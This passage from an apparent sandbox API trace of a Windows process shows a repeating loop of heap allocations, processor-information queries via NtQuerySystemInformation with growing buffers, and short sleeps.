lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0301.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0301.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0301.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0301.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0301.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0301.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.130] Sleep (dwMilliseconds=0x110) [0301.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.138] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0301.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0301.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0301.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0301.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0301.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0301.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.144] Sleep (dwMilliseconds=0x110) [0301.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0301.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0301.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0301.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0301.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0301.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0301.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0301.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0301.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.159] Sleep (dwMilliseconds=0x110) [0301.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0301.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0301.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0301.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0301.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0301.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0301.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0301.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0301.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.174] Sleep (dwMilliseconds=0x110) [0301.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0301.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0301.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0301.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0301.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0301.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0301.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0301.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0301.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.190] Sleep (dwMilliseconds=0x110) [0301.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0301.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0301.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0301.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0301.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0301.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0301.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.208] Sleep (dwMilliseconds=0x110) [0301.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0301.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0301.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0301.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0301.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0301.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0301.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.224] Sleep (dwMilliseconds=0x110) [0301.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0301.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0301.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0301.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0301.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0301.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0301.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0301.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0301.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.239] Sleep (dwMilliseconds=0x110) [0301.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0301.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0301.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0301.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0301.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.255] Sleep (dwMilliseconds=0x110) [0301.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0301.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0301.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0301.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0301.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0301.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0301.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0301.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0301.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.270] Sleep (dwMilliseconds=0x110) [0301.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0301.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0301.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0301.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0301.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0301.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0301.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.286] Sleep (dwMilliseconds=0x110) [0301.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0301.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0301.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0301.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0301.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0301.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0301.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0301.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0301.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.296] Sleep (dwMilliseconds=0x110) [0301.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0301.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0301.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0301.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0301.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0301.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0301.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.317] Sleep (dwMilliseconds=0x110) [0301.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0301.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0301.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0301.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0301.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0301.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0301.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0301.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0301.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.333] Sleep (dwMilliseconds=0x110) [0301.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0301.345] NtQuerySystemInformation (in: 